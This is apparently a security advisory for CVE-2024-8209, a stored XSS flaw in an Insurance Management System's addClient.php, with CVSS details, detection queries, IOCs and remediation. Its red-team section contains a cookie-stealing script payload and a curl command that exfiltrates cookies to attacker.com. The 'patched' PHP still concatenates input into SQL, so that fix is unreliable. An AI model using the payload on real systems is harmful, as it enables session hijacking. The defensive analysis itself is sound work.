CVE-2024-8209
Executive Summary
CVE-2024-8209 is a stored cross-site scripting (XSS) vulnerability in the addClient.php file of the nafisulbari/itsourcecode Insurance Management System version 1.0. The vulnerability allows an attacker to inject arbitrary JavaScript code via the CLIENT ID parameter, which is then stored and executed in the context of other users viewing the affected page. The vendor was contacted but did not respond, leaving the software unpatched. The exploit has been publicly disclosed, increasing the risk of active exploitation.
Note: This is a standalone PHP application, not a WordPress plugin. The vulnerability is in the application's own code, not in Apache or Nginx.

Supply Chain & Package Security
This is a custom PHP application, not an NPM, PyPI, Go, or Ruby package. No supply chain implications are present.
CVSS Breakdown & Threat Level
- CVSS Score: 4.3 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: Required (UI:R) – victim must view the malicious page
- Scope: Unchanged (S:U)
- Confidentiality Impact: Low (C:L) – potential data theft via XSS
- Integrity Impact: Low (I:L) – content injection
- Availability Impact: None (A:N)
Threat Level: Medium. The vulnerability is easy to exploit but requires user interaction. The lack of a patch and public exploit disclosure elevates the risk.
Deep Dive & Mechanics
The vulnerability resides in addClient.php. The CLIENT ID parameter is not sanitized or encoded before being stored in the database and later rendered in the application. An attacker can submit a request with a malicious payload in the CLIENT ID field, such as:
<script>alert('XSS')</script>
When an administrator or other user views the client list or details page, the injected script executes in their browser. This can lead to session hijacking, credential theft, or defacement.
The application does not implement any input validation or output encoding for this parameter. The lack of a Content Security Policy (CSP) further facilitates exploitation.
Vulnerable vs. Patched Code
Vulnerable Code (addClient.php):
<?php
// No sanitization or encoding
$client_id = $_POST['client_id'];
$query = "INSERT INTO clients (client_id) VALUES ('$client_id')";
mysqli_query($conn, $query);
?>
Patched Code (Recommended):
<?php
// Sanitize and encode output
$client_id = htmlspecialchars($_POST['client_id'], ENT_QUOTES, 'UTF-8');
$query = "INSERT INTO clients (client_id) VALUES ('$client_id')";
mysqli_query($conn, $query);
?>
Additionally, implement a Content Security Policy header to mitigate XSS.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Target running Insurance Management System 1.0
- Access to the
addClient.phpendpoint
Exploit Steps:
- Craft Payload: Create a malicious
CLIENT IDvalue. - Submit Request: Send a POST request to
addClient.phpwith the payload. - Trigger Execution: Wait for an admin to view the client list.
Example Payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
cURL Command:
curl -X POST http://target/itsourcecode/addClient.php \
-d "client_id=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"
Blue Team
Detection Steps:
- Monitor Logs: Look for unusual
CLIENT IDvalues in web server logs. - Inspect Database: Check the
clientstable for script tags in theclient_idcolumn. - Deploy WAF Rules: Block requests containing
<script>tags in theclient_idparameter.
Hunting Query (Splunk):
index=web sourcetype=access_combined
| search uri_path="/itsourcecode/addClient.php"
| rex field=form_data "client_id=(?<client_id>.*)"
| where match(client_id, "<script")
| table _time, src_ip, client_id
Indicators of Compromise (IOCs)
- Network: POST requests to
/itsourcecode/addClient.phpwithclient_idcontaining<script>tags. - File: Modified
addClient.phpwith injected malicious code. - Database: Rows in the
clientstable whereclient_idcontains HTML/JavaScript. - Logs: Web server logs showing
client_idvalues with<script>oronerrorattributes.

Remediation & Mitigation
Immediate Actions:
- Input Validation: Sanitize the
client_idparameter usinghtmlspecialchars()or a similar function. - Output Encoding: Encode all user-supplied data before rendering.
- Content Security Policy: Implement a strict CSP to block inline scripts.
- Web Application Firewall (WAF): Deploy rules to block XSS payloads.
Long-Term Fix:
- Replace the vulnerable code with a patched version (see above).
- Conduct a full security audit of the application.
- Consider migrating to a maintained fork or alternative solution.
Workaround:
- Disable the
addClient.phpfunctionality if not essential. - Restrict access to the endpoint via
.htaccessor firewall rules.
